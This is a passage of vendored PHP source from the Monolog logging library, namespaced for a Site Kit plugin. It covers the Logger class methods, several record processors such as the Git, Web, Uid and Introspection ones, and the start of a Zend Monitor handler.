\WeakMap<\Fiber<mixed, mixed, mixed, mixed>, int> $fiberLogDepth */ $fiberLogDepth = new \WeakMap(); $this->fiberLogDepth = $fiberLogDepth; } } public function getName() : string { return $this->name; } /** * Return a new cloned instance with the name changed */ public function withName(string $name) : self { $new = clone $this; $new->name = $name; return $new; } /** * Pushes a handler on to the stack. */ public function pushHandler(\Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface $handler) : self { \array_unshift($this->handlers, $handler); return $this; } /** * Pops a handler from the stack * * @throws \LogicException If empty handler stack */ public function popHandler() : \Google\Site_Kit_Dependencies\Monolog\Handler\HandlerInterface { if (!$this->handlers) { throw new \LogicException('You tried to pop from an empty handler stack.'); } return \array_shift($this->handlers); } /** * Set handlers, replacing all existing ones. * * If a map is passed, keys will be ignored. * * @param HandlerInterface[] $handlers */ public function setHandlers(array $handlers) : self { $this->handlers = []; foreach (\array_reverse($handlers) as $handler) { $this->pushHandler($handler); } return $this; } /** * @return HandlerInterface[] */ public function getHandlers() : array { return $this->handlers; } /** * Adds a processor on to the stack. */ public function pushProcessor(callable $callback) : self { \array_unshift($this->processors, $callback); return $this; } /** * Removes the processor on top of the stack and returns it. * * @throws \LogicException If empty processor stack * @return callable */ public function popProcessor() : callable { if (!$this->processors) { throw new \LogicException('You tried to pop from an empty processor stack.'); } return \array_shift($this->processors); } /** * @return callable[] */ public function getProcessors() : array { return $this->processors; } /** * Control the use of microsecond resolution timestamps in the 'datetime' * member of new records. * * As of PHP7.1 microseconds are always included by the engine, so * there is no performance penalty and Monolog 2 enabled microseconds * by default. This function lets you disable them though in case you want * to suppress microseconds from the output. * * @param bool $micro True to use microtime() to create timestamps */ public function useMicrosecondTimestamps(bool $micro) : self { $this->microsecondTimestamps = $micro; return $this; } public function useLoggingLoopDetection(bool $detectCycles) : self { $this->detectCycles = $detectCycles; return $this; } /** * Adds a log record. * * @param int $level The logging level (a Monolog or RFC 5424 level) * @param string $message The log message * @param mixed[] $context The log context * @param DateTimeImmutable $datetime Optional log date to log into the past or future * @return bool Whether the record has been processed * * @phpstan-param Level $level */ public function addRecord(int $level, string $message, array $context = [], ?\Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable $datetime = null) : bool { if (isset(self::RFC_5424_LEVELS[$level])) { $level = self::RFC_5424_LEVELS[$level]; } if ($this->detectCycles) { if (\PHP_VERSION_ID >= 80100 && ($fiber = \Fiber::getCurrent())) { // @phpstan-ignore offsetAssign.dimType $this->fiberLogDepth[$fiber] = $this->fiberLogDepth[$fiber] ?? 0; $logDepth = ++$this->fiberLogDepth[$fiber]; } else { $logDepth = ++$this->logDepth; } } else { $logDepth = 0; } if ($logDepth === 3) { $this->warning('A possible infinite logging loop was detected and aborted. It appears some of your handler code is triggering logging, see the previous log record for a hint as to what may be the cause.'); return \false; } elseif ($logDepth >= 5) { // log depth 4 is let through, so we can log the warning above return \false; } try { $record = null; foreach ($this->handlers as $handler) { if (null === $record) { // skip creating the record as long as no handler is going to handle it if (!$handler->isHandling(['level' => $level])) { continue; } $levelName = static::getLevelName($level); $record = ['message' => $message, 'context' => $context, 'level' => $level, 'level_name' => $levelName, 'channel' => $this->name, 'datetime' => $datetime ?? new \Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable($this->microsecondTimestamps, $this->timezone), 'extra' => []]; try { foreach ($this->processors as $processor) { $record = $processor($record); } } catch (\Throwable $e) { $this->handleException($e, $record); return \true; } } // once the record exists, send it to all handlers as long as the bubbling chain is not interrupted try { if (\true === $handler->handle($record)) { break; } } catch (\Throwable $e) { $this->handleException($e, $record); return \true; } } } finally { if ($this->detectCycles) { if (isset($fiber)) { $this->fiberLogDepth[$fiber]--; } else { $this->logDepth--; } } } return null !== $record; } /** * Ends a log cycle and frees all resources used by handlers. * * Closing a Handler means flushing all buffers and freeing any open resources/handles. * Handlers that have been closed should be able to accept log records again and re-open * themselves on demand, but this may not always be possible depending on implementation. * * This is useful at the end of a request and will be called automatically on every handler * when they get destructed. */ public function close() : void { foreach ($this->handlers as $handler) { $handler->close(); } } /** * Ends a log cycle and resets all handlers and processors to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. */ public function reset() : void { foreach ($this->handlers as $handler) { if ($handler instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $handler->reset(); } } foreach ($this->processors as $processor) { if ($processor instanceof \Google\Site_Kit_Dependencies\Monolog\ResettableInterface) { $processor->reset(); } } } /** * Gets all supported logging levels. * * @return array<string, int> Assoc array with human-readable level names => level codes. * @phpstan-return array<LevelName, Level> */ public static function getLevels() : array { return \array_flip(static::$levels); } /** * Gets the name of the logging level. * * @throws \Psr\Log\InvalidArgumentException If level is not defined * * @phpstan-param Level $level * @phpstan-return LevelName */ public static function getLevelName(int $level) : string { if (!isset(static::$levels[$level])) { throw new \Google\Site_Kit_Dependencies\Psr\Log\InvalidArgumentException('Level "' . $level . '" is not defined, use one of: ' . \implode(', ', \array_keys(static::$levels))); } return static::$levels[$level]; } /** * Converts PSR-3 levels to Monolog ones if necessary * * @param string|int $level Level number (monolog) or name (PSR-3) * @throws \Psr\Log\InvalidArgumentException If level is not defined * * @phpstan-param Level|LevelName|LogLevel::* $level * @phpstan-return Level */ public static function toMonologLevel($level) : int { if (\is_string($level)) { if (\is_numeric($level)) { /** @phpstan-ignore-next-line */ return \intval($level); } // Contains chars of all log levels and avoids using strtoupper() which may have // strange results depending on locale (for example, "i" will become "İ" in Turkish locale) $upper = \strtr($level, 'abcdefgilmnortuwy', 'ABCDEFGILMNORTUWY'); if (\defined(__CLASS__ . '::' . $upper)) { return \constant(__CLASS__ . '::' . $upper); } throw new \Google\Site_Kit_Dependencies\Psr\Log\InvalidArgumentException('Level "' . $level . '" is not defined, use one of: ' . \implode(', ', \array_keys(static::$levels) + static::$levels)); } if (!\is_int($level)) { throw new \Google\Site_Kit_Dependencies\Psr\Log\InvalidArgumentException('Level "' . \var_export($level, \true) . '" is not defined, use one of: ' . \implode(', ', \array_keys(static::$levels) + static::$levels)); } return $level; } /** * Checks whether the Logger has a handler that listens on the given level * * @phpstan-param Level $level */ public function isHandling(int $level) : bool { $record = ['level' => $level]; foreach ($this->handlers as $handler) { if ($handler->isHandling($record)) { return \true; } } return \false; } /** * Set a custom exception handler that will be called if adding a new record fails * * The callable will receive an exception object and the record that failed to be logged */ public function setExceptionHandler(?callable $callback) : self { $this->exceptionHandler = $callback; return $this; } public function getExceptionHandler() : ?callable { return $this->exceptionHandler; } /** * Adds a log record at an arbitrary level. * * This method allows for compatibility with common interfaces. * * @param mixed $level The log level (a Monolog, PSR-3 or RFC 5424 level) * @param string|Stringable $message The log message * @param mixed[] $context The log context * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function log($level, $message, array $context = []) : void { if (!\is_int($level) && !\is_string($level)) { throw new \InvalidArgumentException('$level is expected to be a string or int'); } if (isset(self::RFC_5424_LEVELS[$level])) { $level = self::RFC_5424_LEVELS[$level]; } $level = static::toMonologLevel($level); $this->addRecord($level, (string) $message, $context); } /** * Adds a log record at the DEBUG level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function debug($message, array $context = []) : void { $this->addRecord(static::DEBUG, (string) $message, $context); } /** * Adds a log record at the INFO level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function info($message, array $context = []) : void { $this->addRecord(static::INFO, (string) $message, $context); } /** * Adds a log record at the NOTICE level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function notice($message, array $context = []) : void { $this->addRecord(static::NOTICE, (string) $message, $context); } /** * Adds a log record at the WARNING level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function warning($message, array $context = []) : void { $this->addRecord(static::WARNING, (string) $message, $context); } /** * Adds a log record at the ERROR level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function error($message, array $context = []) : void { $this->addRecord(static::ERROR, (string) $message, $context); } /** * Adds a log record at the CRITICAL level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function critical($message, array $context = []) : void { $this->addRecord(static::CRITICAL, (string) $message, $context); } /** * Adds a log record at the ALERT level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function alert($message, array $context = []) : void { $this->addRecord(static::ALERT, (string) $message, $context); } /** * Adds a log record at the EMERGENCY level. * * This method allows for compatibility with common interfaces. * * @param string|Stringable $message The log message * @param mixed[] $context The log context */ public function emergency($message, array $context = []) : void { $this->addRecord(static::EMERGENCY, (string) $message, $context); } /** * Sets the timezone to be used for the timestamp of log records. */ public function setTimezone(\DateTimeZone $tz) : self { $this->timezone = $tz; return $this; } /** * Returns the timezone to be used for the timestamp of log records. */ public function getTimezone() : \DateTimeZone { return $this->timezone; } /** * Delegates exception management to the custom exception handler, * or throws the exception if no custom handler is set. * * @param array $record * @phpstan-param Record $record */ protected function handleException(\Throwable $e, array $record) : void { if (!$this->exceptionHandler) { throw $e; } ($this->exceptionHandler)($e, $record); } /** * @return array<string, mixed> */ public function __serialize() : array { return ['name' => $this->name, 'handlers' => $this->handlers, 'processors' => $this->processors, 'microsecondTimestamps' => $this->microsecondTimestamps, 'timezone' => $this->timezone, 'exceptionHandler' => $this->exceptionHandler, 'logDepth' => $this->logDepth, 'detectCycles' => $this->detectCycles]; } /** * @param array<string, mixed> $data */ public function __unserialize(array $data) : void { foreach (['name', 'handlers', 'processors', 'microsecondTimestamps', 'timezone', 'exceptionHandler', 'logDepth', 'detectCycles'] as $property) { if (isset($data[$property])) { $this->{$property} = $data[$property]; } } if (\PHP_VERSION_ID >= 80100) { // Local variable for phpstan, see https://github.com/phpstan/phpstan/issues/6732#issuecomment-1111118412 /** @var \WeakMap<\Fiber<mixed, mixed, mixed, mixed>, int> $fiberLogDepth */ $fiberLogDepth = new \WeakMap(); $this->fiberLogDepth = $fiberLogDepth; } } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Injects value of gethostname in all records */ class HostnameProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** @var string */ private static $host; public function __construct() { self::$host = (string) \gethostname(); } /** * {@inheritDoc} */ public function __invoke(array $record) : array { $record['extra']['hostname'] = self::$host; return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Injects memory_get_peak_usage in all records * * @see Monolog\Processor\MemoryProcessor::__construct() for options * @author Rob Jensen */ class MemoryPeakUsageProcessor extends \Google\Site_Kit_Dependencies\Monolog\Processor\MemoryProcessor { /** * {@inheritDoc} */ public function __invoke(array $record) : array { $usage = \memory_get_peak_usage($this->realUsage); if ($this->useFormatting) { $usage = $this->formatBytes($usage); } $record['extra']['memory_peak_usage'] = $usage; return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; use Google\Site_Kit_Dependencies\Monolog\ResettableInterface; /** * Adds a unique identifier into records * * @author Simon Mönch <sm@webfactory.de> */ class UidProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface, \Google\Site_Kit_Dependencies\Monolog\ResettableInterface { /** @var string */ private $uid; public function __construct(int $length = 7) { if ($length > 32 || $length < 1) { throw new \InvalidArgumentException('The uid length must be an integer between 1 and 32'); } $this->uid = $this->generateUid($length); } /** * {@inheritDoc} */ public function __invoke(array $record) : array { $record['extra']['uid'] = $this->uid; return $record; } public function getUid() : string { return $this->uid; } public function reset() { $this->uid = $this->generateUid(\strlen($this->uid)); } private function generateUid(int $length) : string { return \substr(\bin2hex(\random_bytes((int) \ceil($length / 2))), 0, $length); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Some methods that are common for all memory processors * * @author Rob Jensen */ abstract class MemoryProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** * @var bool If true, get the real size of memory allocated from system. Else, only the memory used by emalloc() is reported. */ protected $realUsage; /** * @var bool If true, then format memory size to human readable string (MB, KB, B depending on size) */ protected $useFormatting; /** * @param bool $realUsage Set this to true to get the real size of memory allocated from system. * @param bool $useFormatting If true, then format memory size to human readable string (MB, KB, B depending on size) */ public function __construct(bool $realUsage = \true, bool $useFormatting = \true) { $this->realUsage = $realUsage; $this->useFormatting = $useFormatting; } /** * Formats bytes into a human readable string if $this->useFormatting is true, otherwise return $bytes as is * * @param int $bytes * @return string|int Formatted string if $this->useFormatting is true, otherwise return $bytes as int */ protected function formatBytes(int $bytes) { if (!$this->useFormatting) { return $bytes; } if ($bytes > 1024 * 1024) { return \round($bytes / 1024 / 1024, 2) . ' MB'; } elseif ($bytes > 1024) { return \round($bytes / 1024, 2) . ' KB'; } return $bytes . ' B'; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Injects line/file:class/function where the log message came from * * Warning: This only works if the handler processes the logs directly. * If you put the processor on a handler that is behind a FingersCrossedHandler * for example, the processor will only be called once the trigger level is reached, * and all the log records will have the same file/line/.. data from the call that * triggered the FingersCrossedHandler. * * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class IntrospectionProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** @var int */ private $level; /** @var string[] */ private $skipClassesPartials; /** @var int */ private $skipStackFramesCount; /** @var string[] */ private $skipFunctions = ['call_user_func', 'call_user_func_array']; /** * @param string|int $level The minimum logging level at which this Processor will be triggered * @param string[] $skipClassesPartials * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, array $skipClassesPartials = [], int $skipStackFramesCount = 0) { $this->level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); $this->skipClassesPartials = \array_merge(['Monolog\\'], $skipClassesPartials); $this->skipStackFramesCount = $skipStackFramesCount; } /** * {@inheritDoc} */ public function __invoke(array $record) : array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $trace = \debug_backtrace(\DEBUG_BACKTRACE_IGNORE_ARGS); // skip first since it's always the current method \array_shift($trace); // the call_user_func call is also skipped \array_shift($trace); $i = 0; while ($this->isTraceClassOrSkippedFunction($trace, $i)) { if (isset($trace[$i]['class'])) { foreach ($this->skipClassesPartials as $part) { if (\strpos($trace[$i]['class'], $part) !== \false) { $i++; continue 2; } } } elseif (\in_array($trace[$i]['function'], $this->skipFunctions)) { $i++; continue; } break; } $i += $this->skipStackFramesCount; // we should have the call source now $record['extra'] = \array_merge($record['extra'], ['file' => isset($trace[$i - 1]['file']) ? $trace[$i - 1]['file'] : null, 'line' => isset($trace[$i - 1]['line']) ? $trace[$i - 1]['line'] : null, 'class' => isset($trace[$i]['class']) ? $trace[$i]['class'] : null, 'callType' => isset($trace[$i]['type']) ? $trace[$i]['type'] : null, 'function' => isset($trace[$i]['function']) ? $trace[$i]['function'] : null]); return $record; } /** * @param array[] $trace */ private function isTraceClassOrSkippedFunction(array $trace, int $index) : bool { if (!isset($trace[$index])) { return \false; } return isset($trace[$index]['class']) || \in_array($trace[$index]['function'], $this->skipFunctions); } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Injects Git branch and Git commit SHA in all records * * @author Nick Otter * @author Jordi Boggiano <j.boggiano@seld.be> * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class GitProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** @var int */ private $level; /** @var array{branch: string, commit: string}|array<never>|null */ private static $cache = null; /** * @param string|int $level The minimum logging level at which this Processor will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG) { $this->level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function __invoke(array $record) : array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $record['extra']['git'] = self::getGitInfo(); return $record; } /** * @return array{branch: string, commit: string}|array<never> */ private static function getGitInfo() : array { if (self::$cache) { return self::$cache; } $branches = `git branch -v --no-abbrev`; if ($branches && \preg_match('{^\\* (.+?)\\s+([a-f0-9]{40})(?:\\s|$)}m', $branches, $matches)) { return self::$cache = ['branch' => $matches[1], 'commit' => $matches[2]]; } return self::$cache = []; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; use Google\Site_Kit_Dependencies\Monolog\Utils; /** * Processes a record's message according to PSR-3 rules * * It replaces {foo} with the value from $context['foo'] * * @author Jordi Boggiano <j.boggiano@seld.be> */ class PsrLogMessageProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { public const SIMPLE_DATE = "Y-m-d\\TH:i:s.uP"; /** @var string|null */ private $dateFormat; /** @var bool */ private $removeUsedContextFields; /** * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format * @param bool $removeUsedContextFields If set to true the fields interpolated into message gets unset */ public function __construct(?string $dateFormat = null, bool $removeUsedContextFields = \false) { $this->dateFormat = $dateFormat; $this->removeUsedContextFields = $removeUsedContextFields; } /** * {@inheritDoc} */ public function __invoke(array $record) : array { if (\false === \strpos($record['message'], '{')) { return $record; } $replacements = []; foreach ($record['context'] as $key => $val) { $placeholder = '{' . $key . '}'; if (\strpos($record['message'], $placeholder) === \false) { continue; } if (\is_null($val) || \is_scalar($val) || \is_object($val) && \method_exists($val, "__toString")) { $replacements[$placeholder] = $val; } elseif ($val instanceof \DateTimeInterface) { if (!$this->dateFormat && $val instanceof \Google\Site_Kit_Dependencies\Monolog\DateTimeImmutable) { // handle monolog dates using __toString if no specific dateFormat was asked for // so that it follows the useMicroseconds flag $replacements[$placeholder] = (string) $val; } else { $replacements[$placeholder] = $val->format($this->dateFormat ?: static::SIMPLE_DATE); } } elseif ($val instanceof \UnitEnum) { $replacements[$placeholder] = $val instanceof \BackedEnum ? $val->value : $val->name; } elseif (\is_object($val)) { $replacements[$placeholder] = '[object ' . \Google\Site_Kit_Dependencies\Monolog\Utils::getClass($val) . ']'; } elseif (\is_array($val)) { $replacements[$placeholder] = 'array' . \Google\Site_Kit_Dependencies\Monolog\Utils::jsonEncode($val, null, \true); } else { $replacements[$placeholder] = '[' . \gettype($val) . ']'; } if ($this->removeUsedContextFields) { unset($record['context'][$key]); } } $record['message'] = \strtr($record['message'], $replacements); return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Injects url/method and remote IP of the current web request in all records * * @author Jordi Boggiano <j.boggiano@seld.be> */ class WebProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** * @var array<string, mixed>|\ArrayAccess<string, mixed> */ protected $serverData; /** * Default fields * * Array is structured as [key in record.extra => key in $serverData] * * @var array<string, string> */ protected $extraFields = ['url' => 'REQUEST_URI', 'ip' => 'REMOTE_ADDR', 'http_method' => 'REQUEST_METHOD', 'server' => 'SERVER_NAME', 'referrer' => 'HTTP_REFERER', 'user_agent' => 'HTTP_USER_AGENT']; /** * @param array<string, mixed>|\ArrayAccess<string, mixed>|null $serverData Array or object w/ ArrayAccess that provides access to the $_SERVER data * @param array<string, string>|array<string>|null $extraFields Field names and the related key inside $serverData to be added (or just a list of field names to use the default configured $serverData mapping). If not provided it defaults to: [url, ip, http_method, server, referrer] + unique_id if present in server data */ public function __construct($serverData = null, ?array $extraFields = null) { if (null === $serverData) { $this->serverData =& $_SERVER; } elseif (\is_array($serverData) || $serverData instanceof \ArrayAccess) { $this->serverData = $serverData; } else { throw new \UnexpectedValueException('$serverData must be an array or object implementing ArrayAccess.'); } $defaultEnabled = ['url', 'ip', 'http_method', 'server', 'referrer']; if (isset($this->serverData['UNIQUE_ID'])) { $this->extraFields['unique_id'] = 'UNIQUE_ID'; $defaultEnabled[] = 'unique_id'; } if (null === $extraFields) { $extraFields = $defaultEnabled; } if (isset($extraFields[0])) { foreach (\array_keys($this->extraFields) as $fieldName) { if (!\in_array($fieldName, $extraFields)) { unset($this->extraFields[$fieldName]); } } } else { $this->extraFields = $extraFields; } } /** * {@inheritDoc} */ public function __invoke(array $record) : array { // skip processing if for some reason request data // is not present (CLI or wonky SAPIs) if (!isset($this->serverData['REQUEST_URI'])) { return $record; } $record['extra'] = $this->appendExtraFields($record['extra']); return $record; } public function addExtraField(string $extraName, string $serverName) : self { $this->extraFields[$extraName] = $serverName; return $this; } /** * @param mixed[] $extra * @return mixed[] */ private function appendExtraFields(array $extra) : array { foreach ($this->extraFields as $extraName => $serverName) { $extra[$extraName] = $this->serverData[$serverName] ?? null; } return $extra; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Adds value of getmypid into records * * @author Andreas Hörnicke */ class ProcessIdProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** * {@inheritDoc} */ public function __invoke(array $record) : array { $record['extra']['process_id'] = \getmypid(); return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Injects memory_get_usage in all records * * @see Monolog\Processor\MemoryProcessor::__construct() for options * @author Rob Jensen */ class MemoryUsageProcessor extends \Google\Site_Kit_Dependencies\Monolog\Processor\MemoryProcessor { /** * {@inheritDoc} */ public function __invoke(array $record) : array { $usage = \memory_get_usage($this->realUsage); if ($this->useFormatting) { $usage = $this->formatBytes($usage); } $record['extra']['memory_usage'] = $usage; return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * Adds a tags array into record * * @author Martijn Riemers */ class TagProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** @var string[] */ private $tags; /** * @param string[] $tags */ public function __construct(array $tags = []) { $this->setTags($tags); } /** * @param string[] $tags */ public function addTags(array $tags = []) : self { $this->tags = \array_merge($this->tags, $tags); return $this; } /** * @param string[] $tags */ public function setTags(array $tags = []) : self { $this->tags = $tags; return $this; } /** * {@inheritDoc} */ public function __invoke(array $record) : array { $record['extra']['tags'] = $this->tags; return $record; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; use Google\Site_Kit_Dependencies\Monolog\Logger; use Google\Site_Kit_Dependencies\Psr\Log\LogLevel; /** * Injects Hg branch and Hg revision number in all records * * @author Jonathan A. Schweder <jonathanschweder@gmail.com> * * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class MercurialProcessor implements \Google\Site_Kit_Dependencies\Monolog\Processor\ProcessorInterface { /** @var Level */ private $level; /** @var array{branch: string, revision: string}|array<never>|null */ private static $cache = null; /** * @param int|string $level The minimum logging level at which this Processor will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG) { $this->level = \Google\Site_Kit_Dependencies\Monolog\Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function __invoke(array $record) : array { // return if the level is not high enough if ($record['level'] < $this->level) { return $record; } $record['extra']['hg'] = self::getMercurialInfo(); return $record; } /** * @return array{branch: string, revision: string}|array<never> */ private static function getMercurialInfo() : array { if (self::$cache) { return self::$cache; } $result = \explode(' ', \trim(`hg id -nb`)); if (\count($result) >= 3) { return self::$cache = ['branch' => $result[1], 'revision' => $result[2]]; } return self::$cache = []; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Processor; /** * An optional interface to allow labelling Monolog processors. * * @author Nicolas Grekas <p@tchwork.com> * * @phpstan-import-type Record from \Monolog\Logger */ interface ProcessorInterface { /** * @return array The processed record * * @phpstan-param Record $record * @phpstan-return Record */ public function __invoke(array $record); } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Attribute; /** * A reusable attribute to help configure a class or a method as a processor. * * Using it offers no guarantee: it needs to be leveraged by a Monolog third-party consumer. * * Using it with the Monolog library only has no effect at all: processors should still be turned into a callable if * needed and manually pushed to the loggers and to the processable handlers. */ #[\Attribute(\Attribute::TARGET_CLASS | \Attribute::TARGET_METHOD | \Attribute::IS_REPEATABLE)] class AsMonologProcessor { /** @var string|null */ public $channel = null; /** @var string|null */ public $handler = null; /** @var string|null */ public $method = null; /** * @param string|null $channel The logging channel the processor should be pushed to. * @param string|null $handler The handler the processor should be pushed to. * @param string|null $method The method that processes the records (if the attribute is used at the class level). */ public function __construct(?string $channel = null, ?string $handler = null, ?string $method = null) { $this->channel = $channel; $this->handler = $handler; $this->method = $method; } } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog; /** * Handler or Processor implementing this interface will be reset when Logger::reset() is called. * * Resetting ends a log cycle gets them back to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. * * @author Grégoire Pineau <lyrixx@lyrixx.info> */ interface ResettableInterface { /** * @return void */ public function reset(); } <?php declare (strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Google\Site_Kit_Dependencies\Monolog\Handler; use Google\Site_Kit_Dependencies\Monolog\Formatter\FormatterInterface; use Google\Site_Kit_Dependencies\Monolog\Formatter\NormalizerFormatter; use Google\Site_Kit_Dependencies\Monolog\Logger; /** * Handler sending logs to Zend Monitor * * @author Christian Bergau <cbergau86@gmail.com> * @author Jason Davis <happydude@jasondavis.net> * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class ZendMonitorHandler extends \Google\Site_Kit_Dependencies\Monolog\Handler\AbstractProcessingHandler { /** * Monolog level / ZendMonitor Custom Event priority map * * @var array<int, int> */ protected $levelMap = []; /** * @throws MissingExtensionException */ public function __construct($level = \Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG, bool $bubble = \true) { if (!\function_exists('Google\\Site_Kit_Dependencies\\zend_monitor_custom_event')) { throw new \Google\Site_Kit_Dependencies\Monolog\Handler\MissingExtensionException('You must have Zend Server installed with Zend Monitor enabled in order to use this handler'); } //zend monitor constants are not defined if zend monitor is not enabled. $this->levelMap = [\Google\Site_Kit_Dependencies\Monolog\Logger::DEBUG => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_INFO, \Google\Site_Kit_Dependencies\Monolog\Logger::INFO => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_INFO, \Google\Site_Kit_Dependencies\Monolog\Logger::NOTICE => \Google\Site_Kit_Dependencies\ZEND_MONITOR_EVENT_SEVERITY_INFO, 